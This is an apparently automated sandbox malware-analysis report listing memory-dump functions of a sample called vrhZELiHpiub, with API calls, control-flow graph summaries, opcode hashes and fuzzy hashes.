                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 5a9630a604fb0434f8622b931c0ad147d0f16cb5e22e1677d6e51e083964cfe2
                                                                                            • Instruction ID: 5bc61103dc066b716e59377647c5161574ed281851165b5c705e699aa390c04c
                                                                                            • Opcode Fuzzy Hash: 5a9630a604fb0434f8622b931c0ad147d0f16cb5e22e1677d6e51e083964cfe2
                                                                                            • Instruction Fuzzy Hash: DA919C70A01B458FD729DF29D45079ABBF5FF88304F04892ED48ACBA51D735E88ACB91
                                                                                            Function 00815914 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 633 815914-8159e1 CreateActCtxA 635 8159e3-8159e9 633->635 636 8159ea-815a44 633->636 635->636 643 815a53-815a57 636->643 644 815a46-815a49 636->644 645 815a59-815a65 643->645 646 815a68 643->646 644->643 645->646 648 815a69 646->648 648->648
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 008159D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1809825608.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_810000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: e87ae64545f1e431d35f28efe37eb37a0cab49350a9dbdb8b914daa3081f6798
                                                                                            • Instruction ID: b3fcb644e6047b16264604d01b54e2a74c774b0622573c1f4f3f298b73ad821f
                                                                                            • Opcode Fuzzy Hash: e87ae64545f1e431d35f28efe37eb37a0cab49350a9dbdb8b914daa3081f6798
                                                                                            • Instruction Fuzzy Hash: 1E41E3B0C00619CFDB24DFA9C884BDDBBB6FF85304F24816AD409AB255DB755986CF90
                                                                                            Function 008144C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 649 8144c4-8159e1 CreateActCtxA 652 8159e3-8159e9 649->652 653 8159ea-815a44 649->653 652->653 660 815a53-815a57 653->660 661 815a46-815a49 653->661 662 815a59-815a65 660->662 663 815a68 660->663 661->660 662->663 665 815a69 663->665 665->665
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 008159D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1809825608.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_810000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 88e9c76db1263ba09e9e39a498b897dd43acd533c4222cdbfc6c802f29fed9a0
                                                                                            • Instruction ID: 890025eaf8aaace8342c6314ed8173f1a5cf0943c745c068617f5b56a8094fd0
                                                                                            • Opcode Fuzzy Hash: 88e9c76db1263ba09e9e39a498b897dd43acd533c4222cdbfc6c802f29fed9a0
                                                                                            • Instruction Fuzzy Hash: D341D4B0C0061DCBDB24DFA9C844BDEBBB9FF85304F24806AD409AB255DB755985CF90
                                                                                            Function 04ADECB8 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 677 4adecb8-4aded0c 679 4aded0e-4aded14 677->679 680 4aded17-4aded26 677->680 679->680 681 4aded28 680->681 682 4aded2b-4aded2e 680->682 681->682 683 4aded31-4aded64 DrawTextExW 682->683 684 4aded6d-4aded8a 683->684 685 4aded66-4aded6c 683->685 685->684
                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04ADECA5,?,?), ref: 04ADED57
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1816436913.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_4ad0000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0
                                                                                            • Opcode ID: df2dd00467d792ab1d794ba9eae8ebed9d28ae4c8c89f6a2f0868773cb28f9de
                                                                                            • Instruction ID: 18ee9d0010c9f40166098990997b0b65308368e279e95f0fd4d9c07f20323732
                                                                                            • Opcode Fuzzy Hash: df2dd00467d792ab1d794ba9eae8ebed9d28ae4c8c89f6a2f0868773cb28f9de
                                                                                            • Instruction Fuzzy Hash: 2D31E0B59002499FDB10CF9AD880ADEFBF5FB48320F14842EE869A7210D774A944CFA0
                                                                                            Function 04ADD714 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 666 4add714-4aded0c 668 4aded0e-4aded14 666->668 669 4aded17-4aded26 666->669 668->669 670 4aded28 669->670 671 4aded2b-4aded64 DrawTextExW 669->671 670->671 673 4aded6d-4aded8a 671->673 674 4aded66-4aded6c 671->674 674->673
                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04ADECA5,?,?), ref: 04ADED57
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1816436913.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_4ad0000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0
                                                                                            • Opcode ID: bf3073718ccc1447a51555f4c30140c354b4d880c5f4281001ac5c8fe5e8f29a
                                                                                            • Instruction ID: 4b6be9a915e840b929ae8eb536825d7a93434713ad9abbe8527a8e81753d343f
                                                                                            • Opcode Fuzzy Hash: bf3073718ccc1447a51555f4c30140c354b4d880c5f4281001ac5c8fe5e8f29a
                                                                                            • Instruction Fuzzy Hash: EF31E0B59002099FDB10DF9AD884ADEFBF5FB48320F14842AE81AA7310D774A940CFA0
                                                                                            Function 0081D768 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 688 81d768-81d804 DuplicateHandle 689 81d806-81d80c 688->689 690 81d80d-81d82a 688->690 689->690
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0081D7F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1809825608.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_810000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: fc5a52135d4a3887ff59c93809be2faf243cf79e7fd5a97931530570b753e8c6
                                                                                            • Instruction ID: 5b5b09b923a5fb6e46ec12ad50796c02edb5ee62c097a68a5489617652c8b7f9
                                                                                            • Opcode Fuzzy Hash: fc5a52135d4a3887ff59c93809be2faf243cf79e7fd5a97931530570b753e8c6
                                                                                            • Instruction Fuzzy Hash: C621E5B59002489FDB10CFAAD585ADEBFF5FF48310F14841AE958A3351C378A945CFA5
                                                                                            Function 04AD0381 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 693 4ad0381-4ad03d3 694 4ad03d5-4ad03d9 693->694 695 4ad0423 693->695 697 4ad03e1-4ad0409 GetCurrentThreadId 694->697 696 4ad0425-4ad0437 695->696 698 4ad040b-4ad0411 697->698 699 4ad0412-4ad0421 697->699 698->699 699->696
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 04AD03F8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1816436913.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_4ad0000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentThread
                                                                                            • String ID:
                                                                                            • API String ID: 2882836952-0
                                                                                            • Opcode ID: 55512f82cf6aba00291db028612d5f3a756f70988b1e3f3f0d6091913e2d0281
                                                                                            • Instruction ID: e3a1c1d8166b9ce66776b8813db3bbb2fb6badc22bf3c45f2204172b27ff51e7
                                                                                            • Opcode Fuzzy Hash: 55512f82cf6aba00291db028612d5f3a756f70988b1e3f3f0d6091913e2d0281
                                                                                            • Instruction Fuzzy Hash: FF21C0B59083898FCB11CFA9C4456EEBFF4FB09314F14806AD145A7252D7385945CB62
                                                                                            Function 0081D770 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 701 81d770-81d804 DuplicateHandle 702 81d806-81d80c 701->702 703 81d80d-81d82a 701->703 702->703
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0081D7F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1809825608.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_810000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 9fec18db6f65c058fa3d4a5ab3c1f13e531a097ba0e44e00c4f5b9442876e21d
                                                                                            • Instruction ID: 72d62b3c8d39ae85c90a467384f403858ed0067b4aebc5acab7a4f50510c252e
                                                                                            • Opcode Fuzzy Hash: 9fec18db6f65c058fa3d4a5ab3c1f13e531a097ba0e44e00c4f5b9442876e21d
                                                                                            • Instruction Fuzzy Hash: FA21C4B59002589FDB10CF9AD584ADEBBF9FB48310F14841AE954A7350D374A944CFA5
                                                                                            Function 04AD0398 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 706 4ad0398-4ad03d3 707 4ad03d5-4ad03d9 706->707 708 4ad0423 706->708 710 4ad03e1-4ad0409 GetCurrentThreadId 707->710 709 4ad0425-4ad0437 708->709 711 4ad040b-4ad0411 710->711 712 4ad0412-4ad0421 710->712 711->712 712->709
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 04AD03F8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1816436913.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_4ad0000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentThread
                                                                                            • String ID:
                                                                                            • API String ID: 2882836952-0
                                                                                            • Opcode ID: 52b6b585deb68c9cfb19887ced59b5d2030fb93eba9917343942091e0e21edf0
                                                                                            • Instruction ID: 57ff2d7ef05b75b5220abf51cf99c8a809ae81f360c2e03a53b774b1e9fee6ab
                                                                                            • Opcode Fuzzy Hash: 52b6b585deb68c9cfb19887ced59b5d2030fb93eba9917343942091e0e21edf0
                                                                                            • Instruction Fuzzy Hash: 2D1188B59042498FDB10DFAAC445BEEBBF8FB48324F14842AD459A3241D778A584CFA1
                                                                                            Function 0081B078 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0081B0DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1809825608.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_810000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 4817a12b66dcc3e8182db2770dbb92072f56ce1a814da6518c6e12b4272d16be
                                                                                            • Instruction ID: 454f3034e1370ebd30d8b5b96dc0c56f6ec123588f185bf393036002f8c012c6
                                                                                            • Opcode Fuzzy Hash: 4817a12b66dcc3e8182db2770dbb92072f56ce1a814da6518c6e12b4272d16be
                                                                                            • Instruction Fuzzy Hash: 15110FB5C006498FCB10DF9AC444ADEFBF8EF88324F10842AD829A7210D375A585CFA1
                                                                                            Function 04ADED91 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04ADECA5,?,?), ref: 04ADED57
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1816436913.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_4ad0000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0
                                                                                            • Opcode ID: c2ce2115bc8edd1feed5833866cea19012da119cfcfa86e6122f498494ee224b
                                                                                            • Instruction ID: 7447dc3992b7374442e04fa5f9d133e446866de3d916f18567ad3a217d62c4bc
                                                                                            • Opcode Fuzzy Hash: c2ce2115bc8edd1feed5833866cea19012da119cfcfa86e6122f498494ee224b
                                                                                            • Instruction Fuzzy Hash: E401AD728002489FDB11DFA8E8447CEBFB1BB88324F18800AE15AAB221C775A445CB61
                                                                                            Function 007BD1FC Relevance: .1, Instructions: 76COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1808808310.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_7bd000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ff321c49327f342d82cbbbbabca87432539e4d09a3c9937530eaf3302251f6cc
                                                                                            • Instruction ID: 9eed287fd5be9dc2acf1709c80aec13d008e939d138866f6c20f85e81c7b67c8
                                                                                            • Opcode Fuzzy Hash: ff321c49327f342d82cbbbbabca87432539e4d09a3c9937530eaf3302251f6cc
                                                                                            • Instruction Fuzzy Hash: 91210372504280DFCB15DF14D9C4BAABF65FB88310F20C569ED094B256D33ADC16CBA1
                                                                                            Function 007CD01C Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1808881900.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_7cd000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7e8da3406d780a1dca2f1394ad623f878b4b1420f686f95207aa1e53b052301b
                                                                                            • Instruction ID: 3e54bb86537d02d8c5b959f475182c5ab41f94fe12a9e7071a4d505d0ecce9e7
                                                                                            • Opcode Fuzzy Hash: 7e8da3406d780a1dca2f1394ad623f878b4b1420f686f95207aa1e53b052301b
                                                                                            • Instruction Fuzzy Hash: BA21D071604204DFCB24DF18D9C4F26BBA5EB88314F20C57DD84A4B296C33ADC87CA61
                                                                                            Function 007CD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1808881900.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_7cd000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cf08ed31cf57a77760c882f59440bb3c7335c68ea1b0c0f87d97a82296bffb3d
                                                                                            • Instruction ID: 0e474fda36d3f0a849c4b4c1b2f49b440f9273a59d76bcb39189a13405fe7e8e
                                                                                            • Opcode Fuzzy Hash: cf08ed31cf57a77760c882f59440bb3c7335c68ea1b0c0f87d97a82296bffb3d
                                                                                            • Instruction Fuzzy Hash: 2321F2B1504204EFDB25DF14D9C4F26BBA5FB88314F24C67DE8494B296C33ADC46CA61
                                                                                            Function 007BD1F7 Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1808808310.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_7bd000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                            • Instruction ID: 6c09fa9bda38676ee3a2c9a6c320f9822a0025198021805b986b03a22037c4ac
                                                                                            • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                            • Instruction Fuzzy Hash: 5D21B176504280DFDB16CF50D9C4B96BF72FB98314F24C5A9ED090B656C33AD82ACBA1
                                                                                            Function 007CD1CF Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1808881900.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_7cd000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                            • Instruction ID: 0049c0cc9a90065747447f96cf608d98403b0006f53a3be759710ebfd9de0c7f
                                                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                            • Instruction Fuzzy Hash: 60118B76504280DFDB16CF14D9C4B15BBA1FB84324F24C6AED8494B696C33AD84ACB61
                                                                                            Function 007CD017 Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1808881900.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_7cd000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                            • Instruction ID: a30ae305594a42210599a7e4da668619d645c45d681d7457ad87a8a60e5f2847
                                                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                            • Instruction Fuzzy Hash: 4A119D75504284DFDB25CF18D5C4B16FFA2FB88314F24C6AED8494B656C33AD84ACBA2
                                                                                            Function 007BD745 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1808808310.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_7bd000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 95d861a31a7c6d938cd098a837becb50769f49ed4ada086102cf46532e4f3259
                                                                                            • Instruction ID: accb27f8296777b4065bc0c05a530cf99263f5950ed3aa83c73b0834c8a97833
                                                                                            • Opcode Fuzzy Hash: 95d861a31a7c6d938cd098a837becb50769f49ed4ada086102cf46532e4f3259
                                                                                            • Instruction Fuzzy Hash: 9A01DB710093409AE7305E26CD84BE7BF98DF51324F18C56AED194B286EA7DDC41C671
                                                                                            Function 007BD744 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.1808808310.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_7bd000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5721e994ce8e6603006e87f7800677740f4681c24eccdc1a8d38c06b17ef6ebf
                                                                                            • Instruction ID: f1e291f8917f2907bf7e3818795178515fa0d00501ff610a2274b4d31b74cee8
                                                                                            • Opcode Fuzzy Hash: 5721e994ce8e6603006e87f7800677740f4681c24eccdc1a8d38c06b17ef6ebf
                                                                                            • Instruction Fuzzy Hash: 36F096714053449EE7209E16CCC8BA6FFA8EF51734F18C45AED085F286D6799C44CBB1

                                                                                            Execution Graph

                                                                                            Execution Coverage:14.5%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:9
                                                                                            Total number of Limit Nodes:0
                                                                                            execution_graph 20607 111ec85 20611 111c878 20607->20611 20609 111ec90 LdrInitializeThunk 20610 111ecbc 20609->20610 20612 111c894 20611->20612 20612->20609 20613 5518fb4 20614 5518e6b 20613->20614 20615 55190f1 LdrInitializeThunk 20614->20615 20616 5519109 20615->20616

                                                                                            Executed Functions

                                                                                            Function 05518BD0 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.4192215773.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_5510000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cd3b9e97f1244bd402ecfe2882cb5e7a94a81cc1eae82425b72a888d153d05b0
                                                                                            • Instruction ID: 830d0b5b9a699f42ec2412145367ac948648432f9a36c5ca4f63b14f5c27a72b
                                                                                            • Opcode Fuzzy Hash: cd3b9e97f1244bd402ecfe2882cb5e7a94a81cc1eae82425b72a888d153d05b0
                                                                                            • Instruction Fuzzy Hash: C3F1E674E01218DFDB14DFA9D884B9DBBB2BF88304F54C1A9E808AB355DB30A985CF54
                                                                                            Function 05518FB4 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(00000000), ref: 055190F6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.4192215773.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_5510000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: f22c0ef28e3a584b6a5e68097fc50d306c481162607599a5b6d57e28e164d75b
                                                                                            • Instruction ID: b39b2b3495c494e0cb7f7b1e73fc701db9f160d282994229c48e62f022f92752
                                                                                            • Opcode Fuzzy Hash: f22c0ef28e3a584b6a5e68097fc50d306c481162607599a5b6d57e28e164d75b
                                                                                            • Instruction Fuzzy Hash: F8117C74E011099FEB04DFA8E494EADBFB5FF88304F148165F815E7246EB30A981CB68
                                                                                            Function 0111EC85 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.4178481349.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_1110000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: bc96c078ef63ab750eab3aa8ecdcc58dc17901e3f594b5ffc4ecd9cf0897bd13
                                                                                            • Instruction ID: 4ccd0738a3b9f6d46bc8a30ca7bf2e6070056887a58180c5ca7a12fcb5f79759
                                                                                            • Opcode Fuzzy Hash: bc96c078ef63ab750eab3aa8ecdcc58dc17901e3f594b5ffc4ecd9cf0897bd13
                                                                                            • Instruction Fuzzy Hash: 11217E74E11229CFDB68DFA8D984B9DBBB1BF49304F5080A9D809E7365DB30A985CF40
                                                                                            Function 010AD468 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.4177929548.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_10ad000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5163e0d4b081262029f8961b7d2dbc7760ca3f2c349cffe67013baf7005fa861
                                                                                            • Instruction ID: 06281c93bdb09a4df93044befe86bd82aac1fefd58b6bdb1e65edad4ee510831
                                                                                            • Opcode Fuzzy Hash: 5163e0d4b081262029f8961b7d2dbc7760ca3f2c349cffe67013baf7005fa861
                                                                                            • Instruction Fuzzy Hash: 86214571100200DFCB01DF98D9C0B6ABFA5FB98318F60C1A9E8890B656C336D446C7A2
                                                                                            Function 010BD044 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.4178009650.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_10bd000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6e5f964deb84a77da0d202a2bc67d442940d818c03e756154c4e4db4af697821
                                                                                            • Instruction ID: 707af027f7e04185db9b2351b080cff91fd657dc8129335b0011325a0a28d9d6
                                                                                            • Opcode Fuzzy Hash: 6e5f964deb84a77da0d202a2bc67d442940d818c03e756154c4e4db4af697821
                                                                                            • Instruction Fuzzy Hash: 14213771504204EFCB11DF58C9C4B66FBA5FB84318F20C9ADE9894B252C73AD446CB61
                                                                                            Function 010AD463 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.4177929548.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_10ad000_vrhZELiHpiub.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction ID: f96cfa2a6c0ebe51911b62ffac09769908d096e550b9155e5080e17c353de04b
                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction Fuzzy Hash: C2110376404240CFCB02CF54D5C4B16BFB2FB94318F24C6A9D8890B657C336D45ACBA2
                                                                                            Function 010BD03F Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.4178009650.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
